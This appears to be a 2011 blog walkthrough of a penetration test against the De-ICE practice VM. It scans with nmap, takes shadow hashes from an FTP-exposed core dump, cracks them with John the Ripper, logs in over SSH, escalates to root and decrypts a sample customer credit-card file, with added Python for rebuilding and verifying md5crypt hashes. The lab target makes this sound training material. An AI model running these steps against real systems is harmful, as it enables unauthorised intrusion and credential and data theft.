Friday, October 28, 2011

Penetration Test on De-ICE Level #1 Disk #2 (De-Ice.net-1.110-1.1)

After installing De-ICE, we are now going to run a penetration test against it. This one is going to be very, very, very long, so get yourself ready physically (stock up on coffee, cigarettes and peanuts) and mentally (enough sleep, no fights with your girlfriend) before reading this hacking module. Let's get straight to it: start De-ICE in VMware and open a terminal. Here is the module.

[De-ICE screenshot]

Module:
root@bt5r1:~# nmap -n 192.168.1.1-255
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.2
Host is up (0.0000080s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
902/tcp  open  iss-realsecure
9876/tcp open  sd

Nmap scan report for 192.168.1.110
Host is up (0.16s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
631/tcp open  ipp
MAC Address: 00:0C:29:FB:68:A2 (VMware)

Nmap scan report for 192.168.1.254
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.254 are filtered
MAC Address: 00:50:56:F4:F6:BF (VMware)

Nmap done: 255 IP addresses (3 hosts up) scanned in 10.42 seconds

From this we can see that 192.168.1.2 is our own IP, so 192.168.1.110 must be the De-ICE IP. Now that we know the target's IP, the next step is to gather more information about the open ports and the services that are probably running on them.

Module:
root@bt5r1:~# nmap -n -sS -sV -O 192.168.1.110

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-27 14:07 WIT
Nmap scan report for 192.168.1.110
Host is up (0.034s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 2.0.4
22/tcp  open  ssh?
80/tcp  open  http    Apache httpd 2.2.4 ((Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2)
631/tcp open  ipp     CUPS 1.1
MAC Address: 00:0C:29:FB:68:A2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.34 seconds

From the scan results we can see that the target has ftp, ssh and httpd (Apache, a web server) active. That is still not much to go on, so let's log in to ftp as the anonymous account to find out more.

Module:
root@bt5r1:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password: (leave it blank, then press "Enter")
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

At this point we have successfully logged in to ftp; next, we will explore the system's directory structure.

Module:
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0              80 Mar 15  2007 .
drwxr-xr-x    4 0        0              80 Mar 15  2007 ..
drwxr-xr-x    7 1000     513           160 Mar 15  2007 download
drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1000     513           160 Mar 15  2007 .
drwxr-xr-x    4 0        0              80 Mar 15  2007 ..
drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc
drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt
drwxr-xr-x   10 1000     513           400 Mar 15  2007 root
drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr
drwxr-xr-x    3 1000     513            80 Mar 15  2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    6 1000     513           340 Mar 15  2007 .
drwxr-xr-x    7 1000     513           160 Mar 15  2007 ..
drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11
-rw-r--r--    1 1000     513        362436 Mar 03  2007 core
drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts
-rw-r--r--    1 1000     513           780 Apr 30  2005 hosts
-rw-r--r--    1 1000     513           718 Jul 03  2005 inputrc
-rw-r--r--    1 1000     513          1296 Jun 10  2006 issue
[snip...]
226 Directory send OK.

Notice the file named core, which holds a core dump (a snapshot of a process's memory, taken for debugging). Grab this file for analysis, then log out of the ftp client.

Module:
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.03 secs (13026.4 kB/s)
ftp> exit
221 Goodbye.

Let's look at this core file. The file we downloaded via ftp is saved automatically in our home directory, /root/.

Module:
root@bt5r1:~# strings core 
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d 
CORE
CORE
FLINUX
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false
HZ=100
HOSTNAME=slax.slackware-live.cd
SHELL=/bin/bash
TERM=xterm
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts
WINDOWID=25165831
HUSHLOGIN=FALSE
QTDIR=/usr/lib/qt
LC_ALL=C
KDE_FULL_SESSION=true
USER=root
[snip...]
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Wow! Look at the last line of the strings output: those are the password hash strings of the De-ICE users. So what's next? We have to run a password-cracking attack, which can be done with the program John the Ripper. We need a dictionary to help the cracking process; you can get the dictionary here.

Module:
root@bt5r1:~# cd dictionaries/
root@bt5r1:~/dictionaries# cat common-1.txt common-2.txt common-3.txt common-4.txt wordlist.txt >>  /root/passwords
root@bt5r1:~/dictionaries# cd ~

The module above concatenates the dictionaries common-1.txt, common-2.txt, common-3.txt, common-4.txt and wordlist.txt into a single file named passwords in the /root/ directory.

OK, we now have our passwords file. Next we need to assemble the shadow string, using the core dump we grabbed earlier.

Module:
root@bt5r1:~# nano /root/shadow

Then paste in the core dump line shown above (the one containing the hashes), delete the system accounts whose password field is just `*`, and tidy the remaining entries up, one per line, into:

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

OK, we now have shadow entries for four users, namely:
root, aadams, bbanter, ccoffee
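The manual cut-and-paste above, done as a script. This is an added example, not code from the original post: it takes the run-together shadow line that `strings` printed, splits it back into one shadow(5) entry per account, and reports which accounts carry a real hash (the `*` entries are locked system accounts and cannot be cracked at all). The DUMP constant is copied from the post but shortened to four of the locked accounts.

```python
import re

# The run-together shadow entries from `strings core` above (copied from the
# post, shortened to four of the locked system accounts for brevity).
DUMP = (
    "root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::"
    "bin:*:9797:0:::::daemon:*:9797:0:::::sshd:*:9797:0:::::nobody:*:9797:0:::::"
    "aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::"
    "bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::"
    "ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::"
)

# shadow(5): name:password:lastchg:min:max:warn:inactive:expire:flag
# The six numeric fields may be empty but each ends in a colon; the trailing
# "flag" field is empty, so the next account name follows straight after it.
ENTRY = re.compile(r"([a-z_][a-z0-9_-]*):([^:]*):((?:\d*:){6})")

def rebuild_shadow(dump):
    """Split the run-together dump back into one shadow line per account."""
    return [f"{user}:{pw}:{rest}" for user, pw, rest in ENTRY.findall(dump)]

def hash_scheme(pw):
    """Describe a password field the way an account audit would."""
    if pw == "":
        return "EMPTY: account logs in without a password"
    if pw[0] in "*!":
        return "locked: no hash, cannot be cracked or used"
    if pw.startswith("$1$"):
        return "md5crypt ($1$): legacy, fixed 1000 MD5 rounds, cheap to brute-force"
    if pw[:3] in ("$5$", "$6$"):
        return "sha-crypt ($5$/$6$): tunable rounds"
    if pw.startswith("$2") or pw.startswith("$y$"):
        return "bcrypt/yescrypt: tunable cost, the current recommendation"
    return "unrecognised scheme"

def audit(dump):
    """Map each account in the dump to a description of its password field."""
    return {line.split(":")[0]: hash_scheme(line.split(":")[1])
            for line in rebuild_shadow(dump)}

def crackable(dump):
    """Only the lines John can load: accounts that actually carry a hash."""
    keep = []
    for line in rebuild_shadow(dump):
        pw = line.split(":")[1]
        if pw and pw[0] not in "*!":
            keep.append(line)
    return keep

if __name__ == "__main__":
    for user, desc in audit(DUMP).items():
        print(f"{user:8} {desc}")
    print("\n".join(crackable(DUMP)))   # the lines that go into /root/shadow
```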

Time to crack! We already have the shadow file and the password library in /root/. Now run this module:

root@bt5r1:~# cd /pentest/passwords/john/
root@bt5r1:/pentest/passwords/john# ./john --rules --wordlist=/root/passwords /root/shadow 
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
Complexity       (root)
Diatomaceous     (ccoffee)
Zymurgy          (bbanter)
guesses: 3  time: 0:00:04:40 4.37% (ETA: Thu Oct 27 16:07:48 2011)  c/s: 6022  trying: Meteorologic
Session aborted

Explanation of the module above:
We use the software John the Ripper in /pentest/passwords/john/, with the wordlist (plus mangling rules) taken from /root/passwords and the target hash strings in /root/shadow. The result: 3 passwords were cracked in 0:00:04:40, namely:

Complexity       (root)
Diatomaceous     (ccoffee)
Zymurgy          (bbanter)
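What John reports as "FreeBSD MD5 [32/32]" is md5crypt, the `$1$` scheme. The block below is an added example, not code from the post: a pure-Python md5crypt (the standard algorithm as in the FreeBSD and glibc implementations) used to re-check the recovered passwords against their shadow lines. It also shows why the scheme is so cheap to attack: a fixed loop of 1000 MD5 rounds with no tunable cost factor.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _b64(value, n):
    # md5crypt's own base64: n little-endian 6-bit groups, custom alphabet
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(n))

def md5crypt(password, salt):
    """Compute a $1$ (md5crypt) hash for password with an up-to-8-char salt."""
    pw, salt = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for i in range(len(pw)):                  # one byte of alt per byte of pw
        ctx.update(alt[i % 16:i % 16 + 1])
    n = len(pw)
    while n:                                  # a \0 or pw[0] per bit of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                     # fixed stretching loop, not tunable
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    out = "".join(_b64((f[a] << 16) | (f[b] << 8) | f[c], 4)
                  for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    out += _b64(f[11], 2)
    return "$1$" + salt.decode() + "$" + out

def check_password(shadow_line, candidate):
    """True if candidate is the password behind a $1$ shadow line (constant-time compare)."""
    stored = shadow_line.split(":")[1]
    if not stored.startswith("$1$"):
        raise ValueError("not an md5crypt hash")
    salt = stored.split("$")[2]
    return hmac.compare_digest(md5crypt(candidate, salt), stored)

if __name__ == "__main__":
    # Two of the (shadow line, password) pairs John recovered above, re-checked.
    for line, guess in (
        ("root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::", "Complexity"),
        ("bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::", "Zymurgy"),
    ):
        print(line.split(":")[0], check_password(line, guess))
```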

So, got the passwords? Now what? That's up to you, but here is the module I ran after obtaining the passwords:

root@blue-dragon:~# ssh bbanter@192.168.1.110
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:2
RSA host key for 192.168.1.110 has changed and you have requested strict checking.
Host key verification failed.
root@blue-dragon:~# nano /root/.ssh/known_hosts
root@blue-dragon:~# ssh bbanter@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is 4c:46:df:3d:04:f5:05:07:16:ee:76:3e:48:0a:5a:b8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
bbanter@192.168.1.110's password: [enter the cracked password]
Linux 2.6.16.
bbanter@slax:~$ ls -a
./  ../  .screenrc
bbanter@slax:~$ cd ..
bbanter@slax:/home$ ls -a
./  ../  aadams/  bbanter/  ccoffee/  ftp/  root/
bbanter@slax:/home$ cd root/
bbanter@slax:/home/root$ ls -a
./  ../  .save/  .screenrc
bbanter@slax:/home/root$ cd .save/
-bash: cd: .save/: Permission denied
bbanter@slax:/home/root$ su
Password: **********
root@slax:/home/root# pwd
/home/root
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls -a
.  ..  copy.sh customer_account.csv.enc
root@slax:/home/root/.save# cat copy.sh 
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
3838:error:0200B015:system library:fread:Is a directory:bss_file.c:198:
3838:error:20082002:BIO routines:FILE_READ:system lib:bss_file.c:199:
root@slax:/home/root/.save# openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
root@slax:/home/root/.save# ls -a
.  ..  .enc  copy.sh  customer_account.csv  customer_account.csv.enc
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save# 

What I did was try to get into a directory with a high privilege level, /root/.save. Once inside, it turned out there was a file about customers; the way to get it is to run the copy.sh module with a small syntax fix.

That's all from me for this tutorial; have fun (=

By: Blue Dragon
Powered by: Red DragonHate Talk, and g0tmi1k 
